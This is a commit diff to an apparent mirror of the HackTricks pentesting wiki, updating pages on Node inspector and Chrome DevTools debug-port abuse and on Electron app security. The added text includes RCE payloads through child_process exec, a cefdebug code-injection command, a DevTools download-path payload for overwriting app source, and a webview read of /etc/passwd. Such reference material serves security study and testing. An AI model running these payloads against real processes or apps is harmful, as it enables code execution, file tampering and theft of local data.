mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3131] No subject
This commit is contained in:
parent
1bad7fe3a2
commit
f72fa0049e
7 changed files with 94 additions and 24 deletions
BIN
.gitbook/assets/image (307) (4).png
Normal file
BIN
.gitbook/assets/image (307) (4).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 34 KiB |
Binary file not shown.
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 509 KiB |
Binary file not shown.
Before Width: | Height: | Size: 24 KiB After Width: | Height: | Size: 96 KiB |
|
@ -42,7 +42,7 @@
|
|||
* [Namespaces](linux-unix/privilege-escalation/docker-breakout/namespaces.md)
|
||||
* [Docker --privileged](linux-unix/privilege-escalation/docker-breakout/docker-privileged.md)
|
||||
* [Abusing Docker Socket for Privilege Escalation](linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md)
|
||||
* [Node/CEF inspector abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
|
||||
* [Node inspector/CEF debug abuse](linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
|
||||
* [Escaping from Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
|
||||
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
|
||||
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Node/CEF inspector abuse
|
||||
# Node inspector/CEF debug abuse
|
||||
|
||||
## Basic Information
|
||||
|
||||
|
@ -23,9 +23,20 @@ node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
|
|||
# Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector
|
||||
```
|
||||
|
||||
Processes based on **CEF** (Chromium Embedded Framework) like **electron could be vulnerable to privilege escalation** if they **left the inspector activated** in the production version that people is using.
|
||||
When you start an inspected process something like this will appear:
|
||||
|
||||
In case of CEF projects, they need to use the param: `--remote-debugging-port=9222`
|
||||
```
|
||||
Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
|
||||
For help, see: https://nodejs.org/en/docs/inspector
|
||||
```
|
||||
|
||||
Processes based on **CEF** (**Chromium Embedded Framework**) like need to use the param: `--remote-debugging-port=9222` to open de **debugger** (the SSRF protections remain very similar). However, they **instead** of granting a **NodeJS** **debug** session will communicate with the browser using the [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), this is an interface to control the browser, but there isn't a direct RCE.
|
||||
|
||||
When you start a debugged browser something like this will appear:
|
||||
|
||||
```
|
||||
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
|
||||
```
|
||||
|
||||
### Browsers, WebSockets and same-origin policy <a href="#browsers-websockets-and-same-origin-policy" id="browsers-websockets-and-same-origin-policy"></a>
|
||||
|
||||
|
@ -35,27 +46,33 @@ Websites open in a web-browser can make WebSocket and HTTP requests under the br
|
|||
This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln).
|
||||
{% endhint %}
|
||||
|
||||
## RCE
|
||||
### Starting inspector in running processes
|
||||
|
||||
You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation.
|
||||
|
||||
```bash
|
||||
kill -s SIGUSR1 <nodejs-ps>
|
||||
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)****
|
||||
This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process.
|
||||
{% endhint %}
|
||||
|
||||
Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like:
|
||||
|
||||
```javascript
|
||||
process.mainModule.require('child_process').exec('calc')
|
||||
|
||||
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
|
||||
|
||||
require('child_process').spawnSync('calc.exe')
|
||||
|
||||
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
|
||||
```
|
||||
|
||||
### Connect to inspector/debugger
|
||||
|
||||
If you have access to a **Chromium base browser** you can connect accessing `chrome://inspect` or `edge://inspect` in Edge. Click the Configure button and ensure your **target host and port** are listed.
|
||||
If you have access to a **Chromium base browser** you can connect accessing `chrome://inspect` or `edge://inspect` in Edge. Click the Configure button and ensure your **target host and port** are listed (Find an example in the following image of how to get RCE using one of the next sections examples).
|
||||
|
||||
![](<../../.gitbook/assets/image (620).png>)
|
||||
|
||||
Using the **command line** you can connect to a debugger/inspector with:
|
||||
|
||||
```bash
|
||||
node inspect <ip>:<port>
|
||||
node inspect 127.0.0.1:9229
|
||||
# RCE example from debug console
|
||||
debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")
|
||||
```
|
||||
|
||||
The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), allows to **find inspectors** running locally and **inject code** into them.
|
||||
|
||||
|
@ -68,7 +85,44 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
|
|||
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) **** (you need to check the API to find interesting things to do with it).
|
||||
{% endhint %}
|
||||
|
||||
## RCE
|
||||
|
||||
{% hint style="info" %}
|
||||
If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)****
|
||||
{% endhint %}
|
||||
|
||||
Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):
|
||||
|
||||
```javascript
|
||||
process.mainModule.require('child_process').exec('calc')
|
||||
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
|
||||
require('child_process').spawnSync('calc.exe')
|
||||
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
|
||||
```
|
||||
|
||||
## Chrome DevTools Protocol Payloads
|
||||
|
||||
You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\
|
||||
In this section I will just list interesting things I find people have used to exploit this protocol.
|
||||
|
||||
### Overwrite Files
|
||||
|
||||
Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**.
|
||||
|
||||
```javascript
|
||||
ws.send(JSON.stringify({
|
||||
id: 42069,
|
||||
method: 'Browser.setDownloadBehavior',
|
||||
params: {
|
||||
behavior: 'allow',
|
||||
downloadPath: '/code/'
|
||||
}
|
||||
}));
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
|
@ -79,3 +133,5 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
|
|||
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1742](https://bugs.chromium.org/p/project-zero/issues/detail?id=1742)
|
||||
* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1944](https://bugs.chromium.org/p/project-zero/issues/detail?id=1944)
|
||||
* [https://nodejs.org/en/docs/guides/debugging-getting-started/](https://nodejs.org/en/docs/guides/debugging-getting-started/)
|
||||
* [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)
|
||||
* [https://larry.science/post/corctf-2021/#saasme-2-solves](https://larry.science/post/corctf-2021/#saasme-2-solves)
|
||||
|
|
|
@ -2,10 +2,14 @@
|
|||
|
||||
Electron is **based on Chromium**, but it is not a browser. Certain principles and security mechanisms implemented by modern browsers are not in place.
|
||||
|
||||
In the source code of an Electron app, inside the `packet.json` you can find specified the `main.js` file where security configs ad set.
|
||||
|
||||
Electron has 2 process types:
|
||||
|
||||
* Main Process
|
||||
* Renderer Process
|
||||
* Main Process (has complete access to NodeJS)
|
||||
* Renderer Process (should have NodeJS restricted access for security reasons)
|
||||
|
||||
![](<../../../.gitbook/assets/image (307).png>)
|
||||
|
||||
A **renderer process** will be a browser window loading a file:
|
||||
|
||||
|
@ -24,6 +28,7 @@ The desktop application might have access to the user’s device through Node AP
|
|||
* **`nodeIntegration`** - is `off` by default. If on, allows to access node features from the renderer process.
|
||||
* **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated.
|
||||
* **`preload`** - empty by default.
|
||||
* **``**[**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
|
||||
|
||||
Example of configuration:
|
||||
|
||||
|
@ -110,17 +115,19 @@ If the contexts aren't isolated an attacker can:
|
|||
3. **Trigger** the use of **overwritten function**
|
||||
4. RCE?
|
||||
|
||||
There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code.
|
||||
There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code:
|
||||
|
||||
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
|
||||
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
|
||||
{% content-ref url="electron-contextisolation-rce-via-electron-internal-code.md" %}
|
||||
[electron-contextisolation-rce-via-electron-internal-code.md](electron-contextisolation-rce-via-electron-internal-code.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Read Internal Files: XSS + contextIsolation
|
||||
|
||||
If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
|
||||
If `contextIsolation` set to false you can try to use \<webview> (similar to \<iframe> but can load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
|
||||
|
||||
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf\_F2ttJg.png>)
|
||||
|
||||
|
@ -145,6 +152,11 @@ window.open("<http://subdomainagoogleq.com/index.html>")
|
|||
</script>
|
||||
```
|
||||
|
||||
## **Tools**
|
||||
|
||||
* [**Electronegativity**](https://github.com/doyensec/electronegativity) is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
|
||||
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) **** is an open source VS Code plugin for Electron applications that uses Electronegativity.
|
||||
|
||||
## **References**
|
||||
|
||||
* [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)
|
||||
|
|
|
@ -33,6 +33,8 @@ Array.prototype.indexOf = function(){
|
|||
|
||||
Check the original slides for other ways to execute programs without having a prompt asking for permissions.
|
||||
|
||||
Apparently another way to load and execute code is to access something like `file://127.0.0.1/electron/rce.jar`
|
||||
|
||||
## Example 2: Discord App RCE
|
||||
|
||||
Example from [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
||||
|
|
Loading…
Reference in a new issue